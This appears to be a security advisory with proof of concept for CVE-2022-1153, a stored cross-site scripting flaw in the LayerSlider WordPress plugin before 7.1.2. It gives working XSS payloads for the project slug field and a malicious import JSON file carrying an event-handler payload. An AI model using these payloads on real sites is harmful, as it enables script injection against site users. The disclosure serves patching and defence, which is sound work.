Tittle:
WordPress Plugin LayerSlider < 7.1.2 - Admin+ Stored Cross-Site Scripting

References:
CVE-2022-1153

Author:
Taurus Omar 

Description:
The plugin does not sanitise and escape Project's slug before outputting it back in various place, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html is disallowed.

Affects Plugins:
LayerSlider - Fixed in version 7.1.2

Proof of Concept:
1.) The stored XSS is done in the template slug of any slider, a javascript payload is added to the SLUG input, which stores the malicious script executing the payload during the reopening of the template or when accessing different functions of the slider.

2.) The vulnerability also allows loading a configuration file (settings.json) with the malicious payload allowing it to be executed within the Slider edition.



## POC1: via (slug slider) 

1.) Add new project & Put Name
2.) Create Blank Project
3.) Project Settings & Tab Publish
4.) Add malicious code in the SLUG: "><img src onerror=alert(/XSS/)>
5.) Exit
6.) Save Project 
7.) XSS will trigger when accessing the project again for example (there seem to be other place when its triggered as well, like in the Project's settings)

## POC2 via (file,json)

1.) Add new post & Create Blank Project
2.) Import Projects
3.) Load file.json

{"properties":{"sliderVersion":"7.x","title":"Via Json","slug":"\">'><details\/open\/ontoggle=confirm('XSS')>","status":true,"schedule_start":"","schedule_end":"","type":"responsive","popupFitWidth":"","popupFitHeight":"","popupPositionHorizontal":"center","popupPositionVertical":"middle","popupWidth":"640","popupHeight":"360","popupDistanceTop":"10","popupDistanceRight":"10","popupDistanceBottom":"10","popupDistanceLeft":"10","popupShowOnTimeout":"","popupShowOnIdle":"","popupShowOnScroll":"","popupShowOnClick":"","popupCloseOnTimeout":"","popupCloseOnScroll":"","popup_repeat":true,"popup_repeat_days":"","popupShowOnce":true,"popup_pages_custom":"","popup_pages_exclude":"","popup_roles_administrator":true,"popup_roles_editor":true,"popup_roles_author":true,"popup_roles_contributor":true,"popup_roles_subscriber":true,"popup_roles_customer":true,"popup_roles_visitor":true,"popupTransitionIn":"fade","popupDurationIn":"1000","popupDelayIn":"200","popupTransitionOut":"fade","popupDurationOut":"500","popupResetOnClose":"slide","popupShowCloseButton":true,"popupCloseButtonStyle":"","popupOverlayClickToClose":true,"popupOverlayBackground":"rgba(0,0,0,.85)","popupOverlayTransitionIn":"fade","popupOverlayDurationIn":"400","popupOverlayTransitionOut":"fade","popupOverlayDurationOut":"400","width":1280,"height":720,"maxwidth":"","responsiveunder":"","fullSizeMode":"normal","fitScreenWidth":true,"allowFullscreen":true,"maxRatio":"","insertMethod":"prependTo","insertSelector":"","clipSlideTransition":"disabled","preventSliderClip":true,"hideunder":"","hideover":"","slideOnSwipe":true,"optimizeForMobile":true,"firstlayer":"1","autostart":true,"startinviewport":true,"pauseonhover":"disabled","keybnav":true,"touchnav":true,"playByScrollSpeed":"1","loops":"0","forceloopnum":true,"skin":"v6","sliderfadeinduration":"350","sliderclass":"","sliderstyle":"margin-bottom: 0px;","backgroundcolor":"","globalBGRepeat":"no-repeat","globalBGAttachment":"scroll","globalBGPosition":"50% 50%","globalBGSize":"auto","navprevnext":true,"navstartstop":true,"navbuttons":true,"hoverprevnext":true,"circletimer":true,"thumb_nav":"hover","thumb_container_width":"60%","thumb_width":"100","thumb_height":"60","thumb_active_opacity":"35","thumb_inactive_opacity":"100","autoplayvideos":true,"rememberUnmuteState":true,"autopauseslideshow":"auto","youtubepreview":"maxresdefault.jpg","slideBGSize":"cover","slideBGPosition":"50% 50%","parallaxSensitivity":"10","parallaxCenterLayers":"center","parallaxCenterDegree":"40","forceLayersOutDuration":"750","useSrcset":"inherit","enhancedLazyLoad":"inherit","preferBlendMode":"disabled","createdWith":"7.0.7"},"layers":[{"properties":{"post_offset":-1,"3d_transitions":"","2d_transitions":"","custom_3d_transitions":"","custom_2d_transitions":"","bgcolor":"","bgposition":"inherit","bgsize":"inherit","slidedelay":"","timeshift":0,"transitionduration":"","kenburnszoom":"disabled","kenburnsscale":1.2,"kenburnsrotate":"","globalhover":false,"parallaxtype":"2d","parallaxevent":"cursor","parallaxaxis":"both","parallaxdistance":10,"parallaxrotate":10,"parallaxdurationmove":1500,"parallaxdurationleave":1200,"parallaxtransformorigin":"50% 50% 0","parallaxtransformperspective":500,"layer_link":"","linkId":"","linkName":"","linkType":"","layer_link_target":"_self","layer_link_type":"over","deeplink":"","overflow":false,"customProperties":[],"post_content":false,"schedule_start":"","schedule_end":""},"sublayers":[],"meta":{"undoStackIndex":-1},"history":[]}]}


Classification:
Type XSS 
OWASP top 10 A7: Cross-Site Scripting (XSS)
CWE-79

wpScan:
https://wpscan.com/vulnerability/1d9d5516-f1c3-4134-b6bf-7f2f890533c4